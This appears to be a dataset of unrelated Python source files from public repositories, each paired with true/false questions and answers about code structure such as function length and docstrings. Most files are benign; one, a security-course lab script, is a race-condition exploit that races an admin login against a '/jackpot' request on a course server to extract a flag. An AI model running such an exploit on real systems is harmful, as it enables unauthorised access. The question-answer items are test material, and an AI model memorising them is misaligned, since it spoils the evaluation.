argstr='-expr "%s"',
mandatory=True,
position=3,
),
in_file_a=dict(
argstr='-a %s',
extensions=None,
mandatory=True,
position=0,
),
in_file_b=dict(
argstr='-b %s',
extensions=None,
position=1,
),
in_file_c=dict(
argstr='-c %s',
extensions=None,
position=2,
),
num_threads=dict(
nohash=True,
usedefault=True,
),
other=dict(
argstr='',
extensions=None,
),
out_file=dict(
argstr='-prefix %s',
extensions=None,
name_source='in_file_a',
name_template='%s_calc',
),
outputtype=dict(),
overwrite=dict(argstr='-overwrite', ),
single_idx=dict(),
start_idx=dict(requires=['stop_idx'], ),
stop_idx=dict(requires=['start_idx'], ),
)
inputs = Calc.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_Calc_outputs():
output_map = dict(out_file=dict(extensions=None, ), )
outputs = Calc.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lines?",
"answer": true
... | 3 | nipype/interfaces/afni/tests/test_auto_Calc.py | PAmcconnell/nipype |
from alembic import context
from prettyconf import config
from sqlalchemy import create_engine
from thales import db
DATABASE_URL = config('DATABASE_URL')
METADATA = db.metadata
def run_migrations_offline():
context.configure(url=DATABASE_URL, metadata=METADATA)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
engine = create_engine(DATABASE_URL)
with engine.connect() as connection:
context.configure(connection=connection, target_metadata=METADATA)
with context.begin_transaction():
context.run_migrations()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | thales/migrations/env.py | cacarrara/thales |
# module for distance computation;
import numpy as np
def dist(arraya, arrayb, mode):
if mode == 0:
dis = np.sum(np.abs(np.subtract(arraya, arrayb)))
elif mode == 1:
dis = np.sqrt(np.sum(np.power(np.subtract(arraya, arrayb), 2)))
else:
dis = 1 - np.dot(arraya, arrayb) / np.sqrt(np.sum(np.power(arraya, 2)) * np.sum(np.power(arrayb, 2)))
return dis
def corr(arraya, arrayb, show):
a = np.subtract(arraya, np.mean(arraya))
b = np.subtract(arrayb, np.mean(arrayb))
corr = np.sum(np.multiply(a, b)) / np.sqrt(np.multiply(np.sum(np.power(a, 2)), np.sum(np.power(b, 2))))
return corr | [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | DCS311 Artificial Intelligence/KNN/lab1_code/M3/dist.py | Lan-Jing/Courses |
from requests import session
from threading import Thread
from re import findall
SERVER = "http://mustard.stt.rnl.tecnico.ulisboa.pt:12202"
s = session()
f = None
def doLogin():
data = {
"username": "admin",
"password": "admin"
}
s.post(SERVER + "/login", data=data)
def doJackpot():
global f
r = s.get(SERVER + "/jackpot")
f = findall(r"SSof{.*}", r.text)
while True:
thrs = [
Thread(target=doLogin),
Thread(target=doJackpot)
]
for thr in thrs: thr.start()
for thr in thrs: thr.join()
if f:
print(f[0])
s.close()
break
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | Labs/6/RaceConditions/RemoteRace/Exploit.py | Opty-MISCE/SS |
import os
import sys
import grammaire
from datalabs.operations.edit.editing import editing
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), "../../../../"))
)
def readfile(file):
with open(file, encoding="utf8") as input:
lines = input.readlines()
return lines
def load_rules(file):
with open(file, encoding="utf8") as input:
str_rules = input.read()
return str_rules
@editing(
name="insert_abbreviation",
contributor="xl_augmenter",
task="Any",
description="This perturbation replaces in texts some well"
" known words or expressions with (one of) their abbreviations.",
)
def insert_abbreviation(
text: str,
max_outputs=1,
seed=0,
):
current_path = os.path.realpath(__file__).replace(
os.path.basename(__file__), "../../../resources/"
)
rulefile_en = f"{current_path}replacement_rules_en.txt"
rules_en = load_rules(rulefile_en)
# First we compile our rules...
grammar_en = grammaire.compile(rules_en)
results = grammaire.parse(text, grammar_en)
# We now replace the strings with their label
perturbed_texts = text
# Each list in results is an element such as: [label, [left,right]]
# label pertains from rules
# left is the left offset of the isolated sequence of words
# right is the right offset of the isolated sequence of words
# elements are stored from last to first in the text along the offsets
for v in results:
from_token = v[1][0]
to_token = v[1][1]
perturbed_texts = (
perturbed_texts[:from_token] + v[0] + perturbed_texts[to_token:]
)
# return [perturbed_texts]
return {"text_insert_abbreviation": perturbed_texts}
# sentence = "Make sure you've gone online to download one of
# the vouchers - it's definitely not worth paying full price for!"
# perturbed = insert_abbreviation(text=sentence)
# print(perturbed)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docst... | 3 | datalabs/operations/edit/plugins/general/insert_abbreviation/transformation.py | ExpressAI/DataLab |
from __future__ import unicode_literals
import json
from urllib.parse import quote
import pytest
import sure # noqa
import moto.server as server
from moto import mock_iot
"""
Test the different server responses
"""
@mock_iot
def test_iot_list():
backend = server.create_backend_app("iot")
test_client = backend.test_client()
# just making sure that server is up
res = test_client.get("/things")
res.status_code.should.equal(200)
@pytest.mark.parametrize(
"url_encode_arn",
[
pytest.param(True, id="Target Arn in Path is URL encoded"),
pytest.param(False, id="Target Arn in Path is *not* URL encoded"),
],
)
@mock_iot
def test_list_attached_policies(url_encode_arn):
backend = server.create_backend_app("iot")
test_client = backend.test_client()
result = test_client.post("/keys-and-certificate?setAsActive=true")
result_dict = json.loads(result.data.decode("utf-8"))
certificate_arn = result_dict["certificateArn"]
test_client.post("/policies/my-policy", json={"policyDocument": {}})
test_client.put("/target-policies/my-policy", json={"target": certificate_arn})
if url_encode_arn:
certificate_arn = quote(certificate_arn, safe="")
result = test_client.post("/attached-policies/{}".format(certificate_arn))
result.status_code.should.equal(200)
result_dict = json.loads(result.data.decode("utf-8"))
result_dict["policies"][0]["policyName"].should.equal("my-policy")
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | tests/test_iot/test_server.py | oakbramble/moto |
from django.db.models import Count, Manager
class ExampleManager(Manager):
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
uuids = [data.uuid for data in objs]
examples = self.in_bulk(uuids, field_name='uuid')
return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
def count_done(self, examples, user=None):
if user:
queryset = self.filter(example_id__in=examples, confirmed_by=user)
else:
queryset = self.filter(example_id__in=examples)
return queryset.distinct().values('example').count()
def measure_member_progress(self, examples, members):
done_count = self.filter(example_id__in=examples)\
.values('confirmed_by__username')\
.annotate(total=Count('confirmed_by'))
response = {
'total': examples.count(),
'progress': [
{
'user': obj['confirmed_by__username'],
'done': obj['total']
} for obj in done_count
]
}
members_with_progress = {o['confirmed_by__username'] for o in done_count}
for member in members:
if member.username not in members_with_progress:
response['progress'].append({
'user': member.username,
'done': 0
})
return response
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/... | 3 | backend/examples/managers.py | daobook/doccano |
#!/bin/python3
# Copyright (C) 2020 Matheus Fernandes Bigolin <mfrdrbigolin@disroot.org>
# SPDX-License-Identifier: MIT
"""Day Thirteen, Shuttle Search."""
from sys import argv
from re import findall
from utils import open_file, arrange, usage_and_exit, product
def solve1(buses, est):
"""Get the earliest bus from the <buses> according to the <est>imate
time. """
arrival = [bus - est%bus for bus in buses]
earliest = min(arrival)
return min(arrival)*buses[arrival.index(earliest)]
def solve2(buses, depart):
"""Find the smallest timestamp, such that all the <buses> follow their
bus ID, which is indexically paired with <depart>.
Here I used the Chinese Remainder Theorem, someone well acquainted to
anyone who does competitive or discrete mathematics. """
# Desired residue class for each bus.
mods = [(b - d) % b for b, d in zip(buses, depart)]
# Cross multiplication of the elements in the sequence.
cross_mul = [product(buses)//b for b in buses]
return sum([c*pow(c, -1, b)*m for b, c, m
in zip(buses, cross_mul, mods)]) % product(buses)
if __name__ == "__main__":
usage_and_exit(len(argv) != 2)
input_file = arrange(open_file(argv[1]))
bus_data = [int(b) for b in findall(r"\d+", input_file[1])]
estimate = int(input_file[0])
depart_data = [i for i,d in enumerate(findall(r"\w+", input_file[1]))
if d != "x"]
print(solve1(bus_data, estimate))
print(solve2(bus_data, depart_data))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | src/day13.py | mfrdbigolin/AoC2020 |
import random
NUMBERS = ["1", "2", "3", "4", "5", "6", "7", "8", "9"]
def read_file():
WORDS = []
with open("./archivos/data.txt", "r", encoding="utf-8") as f:
for line in f:
WORDS.append(line.replace("\n", ""))
return WORDS
def random_word(words):
idx = random.randint(0, len(words) - 1)
return words[idx]
def main():
print("* - * - * - * - * - * - * - * - *- *- *")
print("B I E N V E N I D O A H A N G M A N")
print("* - * - * - * - * - * - * - * - *- *- *")
print("\n")
print("¡Adivina la palabra oculta!")
tries = 0
words = read_file()
current_word = random_word(words)
hidden_word = ['-' for i in current_word]
print(hidden_word)
try:
while True:
current_letter = input("Ingresa una letra: ")
for i in range(len(NUMBERS)):
if current_letter == NUMBERS[i]:
raise ValueError("No ingreses números, solamente letras, por favor")
letter_indexes = []
for idx in range(len(current_word)):
if current_letter == current_word[idx]:
letter_indexes.append(idx)
if len(letter_indexes) == 0:
tries += 1
if tries == 7:
print(hidden_word)
print("")
print("¡Perdiste! La palabra correta era {}".format(current_word))
break
else:
for idx in letter_indexes:
hidden_word[idx] = current_letter
print(hidden_word)
letter_indexes = []
try:
hidden_word.index("-")
except ValueError:
print("¡Ganaste! La palabra era {}".format(current_word))
break
except ValueError as ve:
print(ve)
if __name__ == "__main__":
main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fal... | 3 | hangman.py | KevinCardenasDev/PythonIntermedio |
import abc
class WriterBase(abc.ABC):
@abc.abstractmethod
def set_pipe(self, pipe):
pass
@abc.abstractmethod
def parallel_write_end_loop(self) -> None:
pass
@abc.abstractmethod
def is_running(self):
pass
@abc.abstractmethod
def is_stopped(self):
pass
@abc.abstractmethod
def start_running(self):
pass
@abc.abstractmethod
def __call__(self):
pass
class ReaderBase(abc.ABC):
@abc.abstractmethod
def set_pipe(self, pipe):
pass
@abc.abstractmethod
def is_running(self):
pass
@abc.abstractmethod
def is_stopped(self):
pass
@abc.abstractmethod
def start_running(self):
pass
@abc.abstractmethod
def __call__(self):
pass
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | process_exec/parallel_pipe_io_base.py | sreramk/dag_process_exec |
from flask import session, redirect, url_for
from functools import wraps
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("_user_id") is None:
return redirect(url_for("auth.login"))
return f(*args, **kwargs)
return decorated_function
| [
{
"point_num": 1,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lines?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answe... | 3 | caishen_dashboard/auth/utils.py | Kerem-Sami-Coop/caishen-dashboard-be2 |
# coding: utf-8
# Copyright (c) 2015 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE file)
from gravur.common.abstractscrollview import AbstractScrollView
from gravur.contacts.contactpreview import ContactPreview
from gravur.utils import load_widget
@load_widget
class ContactScrollView(AbstractScrollView):
def __init__(self, *args, **kwargs):
# TODO get entries from btctxstore
id = 'e30fa138367bc73b2174f54bd4cf307521ba26fe91539e0a77e22d3dd2cdbc03'
entries = [{'txid': id} for i in range(100)]
kwargs.update({ 'spacing': 5, 'entries': entries })
super(ContactScrollView, self).__init__(*args, **kwargs)
def entry_to_widget(self, entry):
return ContactPreview(**entry)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | gravur/contacts/contactscrollview.py | F483/gravur |
from binary_search import binary_search
# import pytest
def test_binary_search_with_valid_input_in_list():
'''
tests array with a valid case of search key being in array
'''
assert binary_search([1,2,3,4,5,6,7], 6) == 5
def test_binary_search_with_valid_but_not_included_input_in_list():
'''
tests array with valid case of search key not being in array and
returning -1
'''
assert binary_search([1,2,3,4,5,6,7], 10) == -1
def test_binary_search_with_empty_list():
'''
tests array with a valid case of empty array
'''
assert binary_search([], 1) == -1
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answ... | 3 | challenges/binary-search/test_binary_search.py | tyler-fishbone/data-structures-and-algorithms |
# -*- coding: utf-8 -*-
"""
bilibili user
~~~~~~~~~~~~~
目标网站: www.bilibibli.com
爬虫描述: 爬取 bilibili 用户信息
示例链接: https://space.bilibili.com/33683045/
接口格式:
示例接口:
用户信息 - https://api.bilibili.com/x/space/acc/info?mid=26019347&jsonp=jsonp
收藏夹 - https://api.bilibili.com/medialist/gateway/base/created?pn=1&ps=10&up_mid=26019347&jsonp=jsonp
订阅番剧 - https://space.bilibili.com/ajax/Bangumi/getList?mid=26019347
订阅标签 - https://space.bilibili.com/ajax/tags/getSubList?mid=26019347
直播间 - https://api.live.bilibili.com/room/v1/Room/getRoomInfoOld?mid=26019347
反爬策略:
数据格式:
数据字段:
"""
import scrapy
from scrapy.crawler import CrawlerProcess
class BilibiliUserSpider(scrapy.Spider):
name = 'bilibili_user'
allowed_domains = ['space.bilibili.com']
start_urls = ['https://api.bilibili.com/x/space/acc/info?mid=26019347&jsonp=jsonp']
def parse(self, response):
pass
#ITEM_PIPELINES = {
# 'crawler.pipelines.CrawlerPipeline': 300,
#}
#SPIDER_MIDDLEWARES = {
# 'crawler.middlewares.CrawlerSpiderMiddleware': 543,
#}
#DOWNLOADER_MIDDLEWARES = {
# 'crawler.middlewares.CrawlerDownloaderMiddleware': 543,
#}
settings = dict(
# ITEM_PIPELINES=ITEM_PIPELINES,
# SPIDER_MIDDLEWARES=SPIDER_MIDDLEWARES,
# DOWNLOADER_MIDDLEWARES=DOWNLOADER_MIDDLEWARES,
)
def main():
process = CrawlerProcess(settings)
process.crawl(BilibiliUserSpider)
process.start()
if __name__ == "__main__":
main() | [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | dev/bilibili_user.py | lin-zone/crawler-dev |
# coding: utf-8
"""
Seldon Deploy API
API to interact and manage the lifecycle of your machine learning models deployed through Seldon Deploy. # noqa: E501
OpenAPI spec version: v1alpha1
Contact: hello@seldon.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import seldon_deploy_sdk
from seldon_deploy_sdk.models.volume import Volume # noqa: E501
from seldon_deploy_sdk.rest import ApiException
class TestVolume(unittest.TestCase):
"""Volume unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testVolume(self):
"""Test Volume"""
# FIXME: construct object with mandatory attributes with example values
# model = seldon_deploy_sdk.models.volume.Volume() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | python/test/test_volume.py | adriangonz/seldon-deploy-sdk |
from .table import Table
from .database import Database
class View(Table):
def __init__(self, db: Database, schema: str, name: str, view_def: str) -> None:
self.viewDefinition = None
super().__init__(db, schema, name)
self.set_view_definition(view_def)
def set_view_definition(self, view_definition: str):
if view_definition is not None and len(view_definition.strip()) > 0:
self.viewDefinition = view_definition
def get_view_definition(self):
return self.viewDefinition
def is_view(self):
return True
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inherit... | 3 | dataprep/eda/create_db_report/db_models/view.py | devinllu/dataprep |
from functools import wraps
from typing import Callable, TypeVar
from graphene import ResolveInfo
from typing_extensions import Concatenate, ParamSpec
R_f = TypeVar("R_f")
R_fn = TypeVar("R_fn")
P = ParamSpec("P")
def context(fn: Callable[Concatenate[ResolveInfo, P], R_fn]) -> Callable[P, R_fn]:
"""
Injects the context parameter into the wrapped function fn.
Parameters
----------
fn : Callable[Concatenate[ResolveInfo, P], R_fn]
The function to wrap.
Returns
-------
Callable[P, R_fn]
The wrapped function with context injected.
"""
@wraps(fn)
def wrapper(*args: P.args, **kwargs: P.kwargs) -> R_fn:
info = next(arg for arg in args if isinstance(arg, ResolveInfo))
return fn(info.context, *args, **kwargs)
return wrapper
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"a... | 3 | backend/decorators/helpers.py | hovedstyret/indok-web |
from celery.loaders.base import BaseLoader
class AppLoader(BaseLoader):
def on_worker_init(self):
self.import_default_modules()
def read_configuration(self):
return {}
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | celery/loaders/app.py | frac/celery |
import json, os
from position import Pos
class Loader:
def __init__(self, id):
file_name = str(id) + ".json"
path = os.path.dirname(__file__)
path_json = os.path.join(path, "data", file_name)
file = open(path_json)
dict = json.load(file)
players = dict["players"]
for t,team in enumerate(players):
for player in team:
self.parse_player(t+1, player) # 0->1
def parse_player(self, team, element):
id = element["id"]
coord = element["coord"]
pos = Pos(coord)
self.new_player(pos, int(id), team)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | src/map/loader.py | paoli7612/Elements |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class UpdateImageAttributeRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'faas', '2017-08-24', 'UpdateImageAttribute')
self.set_method('POST')
def get_Name(self):
return self.get_query_params().get('Name')
def set_Name(self,Name):
self.add_query_param('Name',Name)
def get_Description(self):
return self.get_query_params().get('Description')
def set_Description(self,Description):
self.add_query_param('Description',Description)
def get_FpgaImageUUID(self):
return self.get_query_params().get('FpgaImageUUID')
def set_FpgaImageUUID(self,FpgaImageUUID):
self.add_query_param('FpgaImageUUID',FpgaImageUUID)
def get_callerUid(self):
return self.get_query_params().get('callerUid')
def set_callerUid(self,callerUid):
self.add_query_param('callerUid',callerUid)
def get_Tags(self):
return self.get_query_params().get('Tags')
def set_Tags(self,Tags):
self.add_query_param('Tags',Tags) | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer":... | 3 | aliyun-python-sdk-faas/aliyunsdkfaas/request/v20170824/UpdateImageAttributeRequest.py | liumihust/aliyun-openapi-python-sdk |
from typing import AbstractSet, Any, Mapping, Optional
def stringify(self_: Any, use: Optional[Mapping[str, Any]] = None, hide: Optional[AbstractSet[str]] = None) -> str:
name = self_.__class__.__name__
state = self_.__dict__
return f'{name}({_stringify_state(state, use or {}, hide or set())})'
def _stringify_state(current_state: Mapping[str, Any],
custom_field_repr: Mapping[str, Any],
hidden_fields: AbstractSet[str]) -> str:
hidden_fields = {_strip_qualifiers(field) for field in hidden_fields}
current_state = {_strip_qualifiers(key): value for key, value in current_state.items()}
custom_field_repr = {_strip_qualifiers(key): value for key, value in custom_field_repr.items()}
current_state.update(custom_field_repr)
return ', '.join(f'{key}: {value!r}' for key, value in current_state.items() if key not in hidden_fields)
def _strip_qualifiers(value: str) -> str:
return value.lstrip('_')
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
... | 3 | cmaj/utils/stringify.py | marianwieczorek/cmaj |
import LL1
class Node(LL1.Node):
def delete(self, k):
if(k<0):
return None
node = self
nodeinit = node
if(k==0):
nodeinit = nodeinit.next
else:
i = 1
while(node.next != None):
if(i == k):
node.next = node.next.next
break
i += 1
node = node.next
return nodeinit
# Testing Area
class Product:
def __init__(self, name):
self.name = name
if(__name__ == "__main__"):
ll = Node(0)
ll.next = Node(1)
ll.next.next = Node(2)
ll.next.next.next = Node(3)
node1 = ll.delete(-1)
node1.transverse()
ll.transverse() | [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
... | 3 | LL4.py | Am4teur/LinkedList |
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: MNN
import flatbuffers
class Plugin(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsPlugin(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = Plugin()
x.Init(buf, n + offset)
return x
# Plugin
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# Plugin
def Type(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.String(o + self._tab.Pos)
return None
# Plugin
def Attr(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
x = self._tab.Vector(o)
x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
x = self._tab.Indirect(x)
from .Attribute import Attribute
obj = Attribute()
obj.Init(self._tab.Bytes, x)
return obj
return None
# Plugin
def AttrLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.VectorLen(o)
return 0
def PluginStart(builder): builder.StartObject(2)
def PluginAddType(builder, type): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(type), 0)
def PluginAddAttr(builder, attr): builder.PrependUOffsetTRelativeSlot(1, flatbuffers.number_types.UOffsetTFlags.py_type(attr), 0)
def PluginStartAttrVector(builder, numElems): return builder.StartVector(4, numElems, 4)
def PluginEnd(builder): return builder.EndObject()
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self... | 3 | pymnn/pip_package/MNN/tools/mnn_fb/Plugin.py | xhuan28/MNN |
import numpy as np
from .provider import BaseProvider
from pathlib import Path
from torch import is_tensor
class AudioProvider(BaseProvider):
"""Provides the data for the audio modality."""
def __init__(self, *args, **kwargs):
self.modality = 'audio'
super().__init__(*args, **kwargs)
def process_input(self, data, labels):
return data, labels
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answe... | 3 | end2you/data_provider/audio_provider.py | tfyd/myEnd2you |
import sort_utils
def mergeTwoSorted(array1, array2):
len1 = len(array1)
len2 = len(array2)
result = [None for _ in range(len1 + len2)]
i1 = 0
i2 = 0
ir = 0
while i1 < len1 and i2 < len2:
if array1[i1] <= array2[i2]:
result[ir] = array1[i1]
i1 += 1
else:
result[ir] = array2[i2]
i2 += 1
ir += 1
while i1 < len1:
result[ir] = array1[i1]
i1 += 1
ir += 1
while i2 < len2:
result[ir] = array2[i2]
i2 += 1
ir += 1
return result
def mergeSort(array):
if len(array) < 2:
return array
i = len(array) // 2
return mergeTwoSorted(mergeSort(array[:i]), mergeSort(array[i:]))
# TESTS
intsActual = mergeSort(sort_utils.unsortedInts)
assert intsActual == sort_utils.sortedInts
print(intsActual)
floatsActual = mergeSort(sort_utils.unsortedFloats)
assert floatsActual == sort_utils.sortedFloats
print(floatsActual)
assert mergeSort([]) == []
assert mergeSort([2]) == [2]
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside... | 3 | tests_sort/05_30/merge_sort.py | pfreese/py_test |
import unittest
from localstack.utils.tagging import TaggingService
class TestTaggingService(unittest.TestCase):
svc = TaggingService()
def test_list_empty(self):
result = self.svc.list_tags_for_resource("test")
self.assertEqual({"Tags": []}, result)
def test_create_tag(self):
tags = [{"Key": "key_key", "Value": "value_value"}]
self.svc.tag_resource("arn", tags)
actual = self.svc.list_tags_for_resource("arn")
expected = {"Tags": [{"Key": "key_key", "Value": "value_value"}]}
self.assertDictEqual(expected, actual)
def test_delete_tag(self):
tags = [{"Key": "key_key", "Value": "value_value"}]
self.svc.tag_resource("arn", tags)
self.svc.untag_resource("arn", ["key_key"])
result = self.svc.list_tags_for_resource("arn")
self.assertEqual({"Tags": []}, result)
def test_list_empty_delete(self):
self.svc.untag_resource("arn", ["key_key"])
result = self.svc.list_tags_for_resource("arn")
self.assertEqual({"Tags": []}, result)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
... | 3 | tests/unit/test_tagging.py | jorges119/localstack |
import pytest
import numpy as np
import cirq
from cirq.contrib.svg import circuit_to_svg
def test_svg():
a, b, c = cirq.LineQubit.range(3)
svg_text = circuit_to_svg(
cirq.Circuit(
cirq.CNOT(a, b),
cirq.CZ(b, c),
cirq.SWAP(a, c),
cirq.PhasedXPowGate(exponent=0.123, phase_exponent=0.456).on(c),
cirq.Z(a),
cirq.measure(a, b, c, key='z'),
cirq.MatrixGate(np.eye(2)).on(a),
))
assert '<svg' in svg_text
assert '</svg>' in svg_text
def test_svg_noise():
noise_model = cirq.ConstantQubitNoiseModel(cirq.DepolarizingChannel(p=1e-3))
q = cirq.LineQubit(0)
circuit = cirq.Circuit(cirq.X(q))
circuit = cirq.Circuit(noise_model.noisy_moments(circuit.moments, [q]))
svg = circuit_to_svg(circuit)
assert '>D(0.001)</text>' in svg
def test_validation():
with pytest.raises(ValueError):
circuit_to_svg(cirq.Circuit())
q0 = cirq.LineQubit(0)
with pytest.raises(ValueError):
circuit_to_svg(
cirq.Circuit([cirq.Moment([cirq.X(q0)]),
cirq.Moment([])]))
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer":... | 3 | cirq/contrib/svg/svg_test.py | lilies/Cirq |
class Publisher:
def __init__(self):
self.observers = []
def add(self, observer):
if observer not in self.observers:
self.observers.append(observer)
else:
print('Failed to add: {}'.format(observer))
def remove(self, observer):
try:
self.observers.remove(observer)
except ValueError:
print('Failed to remove: {}'.format(observer))
def notify(self):
[o.notify(self) for o in self.observers]
class DefaultFormatter(Publisher):
def __init__(self, name):
Publisher.__init__(self)
self.name = name
self._data = 0
def __str__(self):
return "{}: '{}' has data = {}".format(type(self).__name__, self.name, self._data)
@property
def data(self):
return self._data
